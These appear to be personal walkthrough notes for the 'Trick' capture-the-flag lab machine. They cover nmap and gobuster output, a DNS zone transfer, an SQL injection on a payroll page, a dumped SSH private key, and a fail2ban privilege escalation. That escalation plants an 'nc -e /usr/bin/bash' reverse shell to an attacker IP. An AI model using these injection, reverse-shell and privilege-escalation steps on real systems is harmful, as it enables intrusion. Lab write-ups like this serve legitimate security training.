# Trick # IP > **10.10.11.166** # Users > Enemigosss : SuperGucciRainbowCake > # Nmap ``` Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-18 20:46 CEST Stats: 0:00:51 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 93.75% done; ETC: 20:47 (0:00:01 remaining) Nmap scan report for trick.htb (10.10.11.166) Host is up (0.056s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 61:ff:29:3b:36:bd:9d:ac:fb: de:1f:56:88:4c:ae:2d (RSA) | 256 9e: cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA) |_ 256 72:93:f9:11:58: de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519) 25/tcp open smtp Postfix smtpd |_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING 53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux) | dns-nsid: |_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian 80/tcp open http nginx 1.14.2 |_http-title: Coming Soon - Start Bootstrap Theme |_http-server-header: nginx/1.14.2 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.92%E=4%D=8/18%OT=22%CT=1%CU=43765%PV=Y%DS=2%DC=T%G=Y%TM=62FE895 OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10A%TI=Z%CI=Z%TS=A)SEQ(SP=1 OS:08%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M537ST11NW7%O2=M537ST11NW7%O OS:3=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST11NW7%O6=M537ST11)WIN(W1=FE88%W2= OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M537NNSN OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: Host: debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 111.80 ms 10.10.16.1 2 29.55 ms trick.htb (10.10.11.166) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 63.64 seconds` ``` # Gobuster ``` /assets (Status: 301) [Size: 185] [--> http://trick.htb/assets/] /css (Status: 301) [Size: 185] [--> http://trick.htb/css/] /js (Status: 301) [Size: 185] [--> http://trick.htb/js/] URL: htt://preprod-payroll.trick.htb /ajax.php (Status: 200) [Size: 0] /assets (Status: 301) [Size: 185] [--> http://preprod-payroll.trick.htb/assets/] /database (Status: 301) [Size: 185] [--> http://preprod-payroll.trick.htb/database/] /db_connect.php (Status: 200) [Size: 0] /employee.php (Status: 200) [Size: 23094] /header.php (Status: 200) [Size: 2548] /home.php (Status: 200) [Size: 486] /index.php (Status: 302) [Size: 9546] [--> login.php] /index.php (Status: 302) [Size: 9546] [--> login.php] /login.php (Status: 200) [Size: 5571] /users.php (Status: 200) [Size: 2197] ``` # Dig └─$ dig trick.htb axfr @10.10.11.166 ``` <<>> DiG 9.18.1-1-Debian <<>> trick.htb axfr @10.10.11.166 ;; global options: +cmd trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800 trick.htb. 604800 IN NS trick.htb. trick.htb. 604800 IN A 127.0.0.1 trick.htb. 604800 IN AAAA ::1 preprod-payroll.trick.htb. 604800 IN CNAME trick.htb. trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800 ;; Query time: 191 msec ;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP) ;; WHEN: Thu Aug 18 21:32:34 CEST 2022 ;; XFR size: 6 records (messages 1, bytes 231) ``` Resultat : preprod-payroll.trick.htb # SQLI preprod-payroll.trick.htb (' OR 1 = 1) URL : `http://preprod-payroll.trick.htb/print_payroll.php?id=1` back-end DBMS: MySQL >= 5.0.12 # VHOST > preprod-payroll.trick.htb > preprod-marketing.trick.htb # SSH ```-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn NhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz c4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G YQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+ 4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/ Ukn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4 1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC DkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0 +93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE hkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L jnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6 IqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C aUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/ KwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC tnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge U+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0 fHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V PH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS 3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA fvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT AuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn In16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP JkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN jsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+ IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ== -----END OPENSSH PRIVATE KEY----- ``` # Privilege Escalation > mv iptables-multiport.conf iptables-multiport.conf.bak && cp iptables-multiport.conf.bak iptables-multiport.conf && chmod 666 iptables-multiport.conf && nano iptables-multiport.conf > /usr/bin/nc -e /usr/bin/bash 10.10.16.47 1234 > > sudo /etc/init.d/fail2ban restart